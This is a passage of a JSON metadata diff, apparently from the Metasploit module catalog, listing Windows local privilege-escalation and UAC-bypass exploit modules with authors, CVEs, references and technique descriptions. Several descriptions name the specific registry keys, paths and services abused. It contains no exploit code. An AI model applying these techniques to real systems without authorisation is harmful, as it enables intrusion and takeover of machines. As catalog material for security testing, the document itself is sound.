+ "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/appxsvc_hard_link_privesc": { + "name": "AppXSvc Hard Link Privilege Escalation", + "fullname": "exploit/windows/local/appxsvc_hard_link_privesc", + "aliases": [], + "rank": 300, + "disclosure_date": "2019-04-09", + "type": "exploit", + "author": [ + "Nabeel Ahmed", + "James Forshaw", + "Shelby Pace" + ], + "description": "There exists a privilege escalation vulnerability for\n Windows 10 builds prior to build 17763. Due to the AppXSvc's\n improper handling of hard links, a user can gain full\n privileges over a SYSTEM-owned file. 
The user can then utilize\n the new file to execute code as SYSTEM.\n\n This module employs a technique using the Diagnostics Hub Standard\n Collector Service (DiagHub) which was discovered by James Forshaw to\n load and execute a DLL as SYSTEM.", + "references": [ + "CVE-2019-0841", + "URL-https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841/", + "URL-https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html", + "URL-https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html", + "URL-https://0x00-0x00.github.io/research/2019/05/30/Coding-a-reliable-CVE-2019-0841-Bypass.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 10" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/appxsvc_hard_link_privesc.rb", + "is_install_path": true, + "ref_name": "windows/local/appxsvc_hard_link_privesc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/ask": { + "name": "Windows Escalate UAC Execute RunAs", + "fullname": "exploit/windows/local/ask", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-01-03", + "type": "exploit", + "author": [ + "mubix ", + "b00stfr3ak" + ], + "description": "This module will attempt to elevate execution level using\n the ShellExecute undocumented RunAs flag to bypass low\n UAC settings.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/local/ask.rb", + "is_install_path": true, + "ref_name": "windows/local/ask", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": 
{}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/bits_ntlm_token_impersonation": { + "name": "SYSTEM token impersonation through NTLM bits authentication on missing WinRM Service.", + "fullname": "exploit/windows/local/bits_ntlm_token_impersonation", + "aliases": [], + "rank": 500, + "disclosure_date": "2019-12-06", + "type": "exploit", + "author": [ + "Cassandre", + "Andrea Pierini (decoder)", + "Antonio Cocomazzi (splinter_code)", + "Roberto (0xea31)" + ], + "description": "This module exploit BITS behavior which tries to connect to the\n local Windows Remote Management server (WinRM) every times it\n starts. The module launches a fake WinRM server which listen on\n port 5985 and triggers BITS. When BITS starts, it tries to\n authenticate to the Rogue WinRM server, which allows to steal a\n SYSTEM token. This token is then used to launch a new process\n as SYSTEM user. In the case of this exploit, notepad.exe is launched\n as SYSTEM. Then, it write shellcode in its previous memory space\n and trigger its execution. As this exploit uses reflective dll\n injection, it does not write any file on the disk. See\n /documentation/modules/exploit/windows/local/bits_ntlm_token_impersonation.md\n for complementary words of information.\n\n Vulnerable operating systems are Windows 10 and Windows servers where WinRM is not running.\n Lab experiments has shown that Windows 7 does not exhibit the vulnerable behavior.\n\n WARNING:\n\n - As this exploit runs a service on the target (Fake WinRM on port\n 5985), a firewall popup may appear on target screen. 
Thus, this exploit\n may not be completely silent.\n\n - This exploit has been successfully tested on :\n Windows 10 (10.0 Build 19041) 32 bits\n Windows 10 Pro, Version 1903 (10.0 Build 18362) 64 bits\n\n - This exploit failed because of no BITS authentication attempt on:\n Windows 7 (6.1 Build 7601, Service Pack 1) 32 bits\n\n - Windows servers are not vulnerable because a genuine WinRM\n service is already running, except if the user has disabled it\n (Or if this exploit succeed to terminate it).\n\n - SE_IMPERSONATE_NAME or SE_ASSIGNPRIMARYTOKEN_NAME privs are\n required.\n\n - BITS must not be running.\n\n - This exploit automatically perform above quoted checks.\n run \"check\" command to run checklist.", + "references": [ + "URL-https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/", + "URL-https://github.com/antonioCoco/RogueWinRM" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/bits_ntlm_token_impersonation.rb", + "is_install_path": true, + "ref_name": "windows/local/bits_ntlm_token_impersonation", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "screen-effects" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/bthpan": { + "name": "MS14-062 Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation", + "fullname": "exploit/windows/local/bthpan", + "aliases": [], + "rank": 200, + "disclosure_date": "2014-07-18", + "type": "exploit", + "author": [ + "Matt Bergin ", + "Jay Smith " + ], + "description": "A vulnerability within Microsoft Bluetooth Personal Area Networking module,\n BthPan.sys, can allow an 
attacker to inject memory controlled by the attacker\n into an arbitrary location. This can be used by an attacker to overwrite\n HalDispatchTable+0x4 and execute arbitrary code by subsequently calling\n NtQueryIntervalProfile.", + "references": [ + "MSB-MS14-062", + "CVE-2014-4971", + "URL-https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt", + "OSVDB-109387" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/bthpan.rb", + "is_install_path": true, + "ref_name": "windows/local/bthpan", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/bypassuac": { + "name": "Windows Escalate UAC Protection Bypass", + "fullname": "exploit/windows/local/bypassuac", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-12-31", + "type": "exploit", + "author": [ + "David Kennedy \"ReL1K\" ", + "mitnick", + "mubix " + ], + "description": "This module will bypass Windows UAC by utilizing the trusted publisher\n certificate through process injection. 
It will spawn a second shell that\n has the UAC flag turned off.", + "references": [ + "URL-http://www.trustedsec.com/december-2010/bypass-windows-uac/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/bypassuac.rb", + "is_install_path": true, + "ref_name": "windows/local/bypassuac", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/bypassuac_comhijack": { + "name": "Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)", + "fullname": "exploit/windows/local/bypassuac_comhijack", + "aliases": [], + "rank": 600, + "disclosure_date": "1900-01-01", + "type": "exploit", + "author": [ + "Matt Nelson", + "b33f", + "OJ Reeves" + ], + "description": "This module will bypass Windows UAC by creating COM handler registry entries in the\n HKCU hive. When certain high integrity processes are loaded, these registry entries\n are referenced resulting in the process loading user-controlled DLLs. These DLLs\n contain the payloads that result in elevated sessions. Registry key modifications\n are cleaned up after payload invocation.\n\n This module requires the architecture of the payload to match the OS, but the\n current low-privilege Meterpreter session architecture can be different. If\n specifying EXE::Custom your DLL should call ExitProcess() after starting your\n payload in a separate process.\n\n This module invokes the target binary via cmd.exe on the target. 
Therefore if\n cmd.exe access is restricted, this module will not run correctly.", + "references": [ + "URL-https://wikileaks.org/ciav7p1/cms/page_13763373.html", + "URL-https://github.com/FuzzySecurity/Defcon25/Defcon25_UAC-0day-All-Day_v1.2.pdf" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2024-09-04 23:49:33 +0000", + "path": "/modules/exploits/windows/local/bypassuac_comhijack.rb", + "is_install_path": true, + "ref_name": "windows/local/bypassuac_comhijack", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "screen-effects" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/bypassuac_dotnet_profiler": { + "name": "Windows Escalate UAC Protection Bypass (Via dot net profiler)", + "fullname": "exploit/windows/local/bypassuac_dotnet_profiler", + "aliases": [], + "rank": 600, + "disclosure_date": "2017-03-17", + "type": "exploit", + "author": [ + "Casey Smith", + "\"Stefan Kanthak\" ", + "bwatters-r7" + ], + "description": "Microsoft Windows allows for the automatic loading of a profiling COM object during\n the launch of a CLR process based on certain environment variables ostensibly to\n monitor execution. In this case, we abuse the profiler by pointing to a payload DLL\n that will be launched as the profiling thread. This thread will run at the permission\n level of the calling process, so an auto-elevating process will launch the DLL with\n elevated permissions. 
In this case, we use gpedit.msc as the auto-elevated CLR\n process, but others would work, too.", + "references": [ + "URL-https://seclists.org/fulldisclosure/2017/Jul/11", + "URL-https://offsec.provadys.com/UAC-bypass-dotnet.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2023-07-21 15:34:49 +0000", + "path": "/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb", + "is_install_path": true, + "ref_name": "windows/local/bypassuac_dotnet_profiler", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/bypassuac_eventvwr": { + "name": "Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)", + "fullname": "exploit/windows/local/bypassuac_eventvwr", + "aliases": [], + "rank": 600, + "disclosure_date": "2016-08-15", + "type": "exploit", + "author": [ + "Matt Nelson", + "Matt Graeber", + "OJ Reeves" + ], + "description": "This module will bypass Windows UAC by hijacking a special key in the Registry under\n the current user hive, and inserting a custom command that will get invoked when\n the Windows Event Viewer is launched. It will spawn a second shell that has the UAC\n flag turned off.\n\n This module modifies a registry key, but cleans up the key once the payload has\n been invoked.\n\n The module does not require the architecture of the payload to match the OS. 
If\n specifying EXE::Custom your DLL should call ExitProcess() after starting your\n payload in a separate process.", + "references": [ + "URL-https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", + "URL-https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/bypassuac_eventvwr.rb", + "is_install_path": true, + "ref_name": "windows/local/bypassuac_eventvwr", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/bypassuac_fodhelper": { + "name": "Windows UAC Protection Bypass (Via FodHelper Registry Key)", + "fullname": "exploit/windows/local/bypassuac_fodhelper", + "aliases": [], + "rank": 600, + "disclosure_date": "2017-05-12", + "type": "exploit", + "author": [ + "winscriptingblog", + "amaloteaux " + ], + "description": "This module will bypass Windows 10 UAC by hijacking a special key in the Registry under\n the current user hive, and inserting a custom command that will get invoked when\n the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC\n flag turned off.\n\n This module modifies a registry key, but cleans up the key once the payload has\n been invoked.\n\n The module does not require the architecture of the payload to match the OS. 
If\n specifying EXE::Custom your DLL should call ExitProcess() after starting your\n payload in a separate process.", + "references": [ + "URL-https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/", + "URL-https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1", + "URL-https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2025-04-23 17:49:11 +0000", + "path": "/modules/exploits/windows/local/bypassuac_fodhelper.rb", + "is_install_path": true, + "ref_name": "windows/local/bypassuac_fodhelper", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/bypassuac_injection": { + "name": "Windows Escalate UAC Protection Bypass (In Memory Injection)", + "fullname": "exploit/windows/local/bypassuac_injection", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-12-31", + "type": "exploit", + "author": [ + "David Kennedy \"ReL1K\" ", + "mitnick", + "mubix ", + "Ben Campbell ", + "Lesage", + "OJ Reeves" + ], + "description": "This module will bypass Windows UAC by utilizing the trusted publisher\n certificate through process injection. It will spawn a second shell that\n has the UAC flag turned off. This module uses the Reflective DLL Injection\n technique to drop only the DLL payload binary instead of three separate\n binaries in the standard technique. 
However, it requires the correct\n architecture to be selected, (use x64 for SYSWOW64 systems also).\n If specifying EXE::Custom your DLL should call ExitProcess() after starting\n your payload in a separate process.", + "references": [ + "URL-http://www.trustedsec.com/december-2010/bypass-windows-uac/", + "URL-http://www.pretentiousname.com/misc/W7E_Source/win7_uac_poc_details.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/bypassuac_injection.rb", + "is_install_path": true, + "ref_name": "windows/local/bypassuac_injection", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/bypassuac_injection_winsxs": { + "name": "Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS", + "fullname": "exploit/windows/local/bypassuac_injection_winsxs", + "aliases": [], + "rank": 600, + "disclosure_date": "2017-04-06", + "type": "exploit", + "author": [ + "Ernesto Fernandez \"L3cr0f\" " + ], + "description": "This module will bypass Windows UAC by utilizing the trusted publisher\n certificate through process injection. It will spawn a second shell that\n has the UAC flag turned off by abusing the way \"WinSxS\" works in Windows\n systems. This module uses the Reflective DLL Injection technique to drop\n only the DLL payload binary instead of three seperate binaries in the\n standard technique. 
However, it requires the correct architecture to be\n selected, (use x64 for SYSWOW64 systems also).", + "references": [ + "URL-https://github.com/L3cr0f/DccwBypassUAC" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/bypassuac_injection_winsxs.rb", + "is_install_path": true, + "ref_name": "windows/local/bypassuac_injection_winsxs", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/bypassuac_sdclt": { + "name": "Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key)", + "fullname": "exploit/windows/local/bypassuac_sdclt", + "aliases": [], + "rank": 600, + "disclosure_date": "2017-03-17", + "type": "exploit", + "author": [ + "enigma0x3", + "bwatters-r7" + ], + "description": "This module will bypass Windows UAC by hijacking a special key in the Registry under\n the current user hive, and inserting a custom command that will get invoked when\n Window backup and restore is launched. 
It will spawn a second shell that has the UAC\n flag turned off.\n\n This module modifies a registry key, but cleans up the key once the payload has\n been invoked.", + "references": [ + "URL-https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/", + "URL-https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-SDCLTBypass.ps1", + "URL-https://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/bypassuac_sdclt.rb", + "is_install_path": true, + "ref_name": "windows/local/bypassuac_sdclt", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/bypassuac_silentcleanup": { + "name": "Windows Escalate UAC Protection Bypass (Via SilentCleanup)", + "fullname": "exploit/windows/local/bypassuac_silentcleanup", + "aliases": [], + "rank": 600, + "disclosure_date": "2019-02-24", + "type": "exploit", + "author": [ + "tyranid", + "enigma0x3", + "nyshone69", + "lokiuox", + "Carter Brainerd (cbrnrd)" + ], + "description": "There's a task in Windows Task Scheduler called \"SilentCleanup\" which, while it's executed as Users, automatically runs with elevated privileges.\n When it runs, it executes the file %windir%\\system32\\cleanmgr.exe. 
Since it runs as Users, and we can control user's environment variables,\n %windir% (normally pointing to C:\\Windows) can be changed to point to whatever we want, and it'll run as admin.", + "references": [ + "URL-https://tyranidslair.blogspot.com/2017/05/exploiting-environment-variables-in.html", + "URL-https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/", + "URL-https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/", + "URL-https://forums.hak5.org/topic/45439-powershell-real-uac-bypass/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Microsoft Windows" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/local/bypassuac_silentcleanup.rb", + "is_install_path": true, + "ref_name": "windows/local/bypassuac_silentcleanup", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/bypassuac_sluihijack": { + "name": "Windows UAC Protection Bypass (Via Slui File Handler Hijack)", + "fullname": "exploit/windows/local/bypassuac_sluihijack", + "aliases": [], + "rank": 600, + "disclosure_date": "2018-01-15", + "type": "exploit", + "author": [ + "bytecode-77", + "gushmazuko" + ], + "description": "This module will bypass UAC on Windows 8-10 by hijacking a special key in the Registry under\n the Current User hive, and inserting a custom command that will get invoked when any binary\n (.exe) application is launched. But slui.exe is an auto-elevated binary that is vulnerable\n to file handler hijacking. 
When we run slui.exe with changed Registry key\n (HKCU:\\Software\\Classes\\exefile\\shell\\open\\command), it will run our custom command as Admin\n instead of slui.exe.\n\n The module modifies the registry in order for this exploit to work. The modification is\n reverted once the exploitation attempt has finished.\n\n The module does not require the architecture of the payload to match the OS. If\n specifying EXE::Custom your DLL should call ExitProcess() after starting the\n payload in a different process.", + "references": [ + "URL-https://github.com/bytecode-77/slui-file-handler-hijack-privilege-escalation", + "URL-https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass.ps1" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/bypassuac_sluihijack.rb", + "is_install_path": true, + "ref_name": "windows/local/bypassuac_sluihijack", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/bypassuac_vbs": { + "name": "Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)", + "fullname": "exploit/windows/local/bypassuac_vbs", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-08-22", + "type": "exploit", + "author": [ + "Vozzie", + "Ben Campbell " + ], + "description": "This module will bypass Windows UAC by utilizing the missing .manifest on the script host\n cscript/wscript.exe binaries.", + "references": [ + "URL-http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html", + "URL-https://github.com/Vozzie/uacscript" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": 
"2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/bypassuac_vbs.rb", + "is_install_path": true, + "ref_name": "windows/local/bypassuac_vbs", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/bypassuac_windows_store_filesys": { + "name": "Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe)", + "fullname": "exploit/windows/local/bypassuac_windows_store_filesys", + "aliases": [], + "rank": 0, + "disclosure_date": "2019-08-22", + "type": "exploit", + "author": [ + "ACTIVELabs", + "sailay1996", + "timwr" + ], + "description": "This module exploits a flaw in the WSReset.exe Windows Store Reset Tool. The tool\n is run with the \"autoElevate\" property set to true, however it can be moved to\n a new Windows directory containing a space (C:\\Windows \\System32\\) where, upon\n execution, it will load our payload dll (propsys.dll).", + "references": [ + "URL-https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html", + "URL-https://github.com/sailay1996/UAC_bypass_windows_store", + "URL-https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/bypassuac_windows_store_filesys.rb", + "is_install_path": true, + "ref_name": "windows/local/bypassuac_windows_store_filesys", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "artifacts-on-disk", + "screen-effects" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/bypassuac_windows_store_reg": { + "name": "Windows 10 UAC Protection Bypass 
Via Windows Store (WSReset.exe) and Registry", + "fullname": "exploit/windows/local/bypassuac_windows_store_reg", + "aliases": [], + "rank": 0, + "disclosure_date": "2019-02-19", + "type": "exploit", + "author": [ + "ACTIVELabs", + "sailay1996", + "bwatters-r7" + ], + "description": "This module exploits a flaw in the WSReset.exe file associated with the Windows\n Store. This binary has autoelevate privs, and it will run a binary file\n contained in a low-privilege registry location. By placing a link to\n the binary in the registry location, WSReset.exe will launch the binary as\n a privileged user.", + "references": [ + "URL-https://www.activecyber.us/activelabs/windows-uac-bypass", + "URL-https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html", + "URL-https://github.com/sailay1996/UAC_bypass_windows_store" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/bypassuac_windows_store_reg.rb", + "is_install_path": true, + "ref_name": "windows/local/bypassuac_windows_store_reg", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "artifacts-on-disk", + "screen-effects" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/canon_driver_privesc": { + "name": "Canon Driver Privilege Escalation", + "fullname": "exploit/windows/local/canon_driver_privesc", + "aliases": [], + "rank": 300, + "disclosure_date": "2021-08-07", + "type": "exploit", + "author": [ + "Jacob Baines", + "Shelby Pace" + ], + "description": "Canon TR150 print drivers versions 3.71.2.10 and below allow local users to read/write files\n within the \"CanonBJ\" directory and its subdirectories. 
By overwriting the DLL at\n C:\\ProgramData\\CanonBJ\\IJPrinter\\CNMWINDOWS\\Canon TR150 series\\LanguageModules\\040C\\CNMurGE.dll\n with a malicious DLL at the right time whilst running the C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs\n script to install a new printer, a timing issue can be exploited to cause the PrintIsolationHost.exe program,\n which runs as NT AUTHORITY\\SYSTEM, to successfully load the malicious DLL. Successful exploitation\n will grant attackers code execution as the NT AUTHORITY\\SYSTEM user.\n\n This module leverages the prnmngr.vbs script\n to add and delete printers. Multiple runs of this\n module may be required given successful exploitation\n is time-sensitive.", + "references": [ + "CVE-2021-38085" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/canon_driver_privesc.rb", + "is_install_path": true, + "ref_name": "windows/local/canon_driver_privesc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [ + "unreliable-session" + ], + "Stability": [ + "service-resource-loss" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/capcom_sys_exec": { + "name": "Windows Capcom.sys Kernel Execution Exploit (x64 only)", + "fullname": "exploit/windows/local/capcom_sys_exec", + "aliases": [], + "rank": 300, + "disclosure_date": "1999-01-01", + "type": "exploit", + "author": [ + "TheWack0lian", + "OJ Reeves" + ], + "description": "This module abuses the Capcom.sys kernel driver's function that allows for an\n arbitrary function to be executed in the kernel from user land. 
This function\n purposely disables SMEP prior to invoking a function given by the caller.\n This has been tested on Windows 7, 8.1, 10 (x64) and Windows 11 (x64) upto build 22000.194.\n Note that builds after 22000.194 contain deny lists that prevent this driver from loading.", + "references": [ + "URL-https://twitter.com/TheWack0lian/status/779397840762245124" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2023-09-08 13:05:44 +0000", + "path": "/modules/exploits/windows/local/capcom_sys_exec.rb", + "is_install_path": true, + "ref_name": "windows/local/capcom_sys_exec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/comahawk": { + "name": "Microsoft UPnP Local Privilege Elevation Vulnerability", + "fullname": "exploit/windows/local/comahawk", + "aliases": [], + "rank": 600, + "disclosure_date": "2019-11-12", + "type": "exploit", + "author": [ + "NCC Group", + "hoangprod", + "bwatters-r7" + ], + "description": "This exploit uses two vulnerabilities to execute a command as an elevated user.\n The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to\n NT AUTHORITY\\LOCAL SERVICE\n The second (CVE-2019-1322) leverages the Update Orchestrator Service to\n elevate from NT AUTHORITY\\LOCAL SERVICE to NT AUTHORITY\\SYSTEM.", + "references": [ + "CVE-2019-1322", + "CVE-2019-1405", + "EDB-47684", + "URL-https://github.com/apt69/COMahawk", + "URL-https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/", + "URL-https://fortiguard.com/threat-signal-report/3243/new-proof-of-concept-combining-cve-2019-1322-and-cve-2019-1405-developed-1" + ], + 
"platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/comahawk.rb", + "is_install_path": true, + "ref_name": "windows/local/comahawk", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/current_user_psexec": { + "name": "PsExec via Current User Token", + "fullname": "exploit/windows/local/current_user_psexec", + "aliases": [], + "rank": 600, + "disclosure_date": "1999-01-01", + "type": "exploit", + "author": [ + "egypt ", + "jabra" + ], + "description": "This module uploads an executable file to the victim system, creates\n a share containing that executable, creates a remote service on each\n target system using a UNC path to that file, and finally starts the\n service(s).\n\n The result is similar to psexec but with the added benefit of using\n the session's current authentication token instead of having to know\n a password or hash.", + "references": [ + "CVE-1999-0504", + "OSVDB-3106", + "URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal" + ], + "mod_time": "2021-10-06 13:43:31 +0000", + "path": "/modules/exploits/windows/local/current_user_psexec.rb", + "is_install_path": true, + "ref_name": "windows/local/current_user_psexec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/cve_2017_8464_lnk_lpe": { + "name": "LNK Code Execution Vulnerability", + "fullname": "exploit/windows/local/cve_2017_8464_lnk_lpe", + "aliases": [], + 
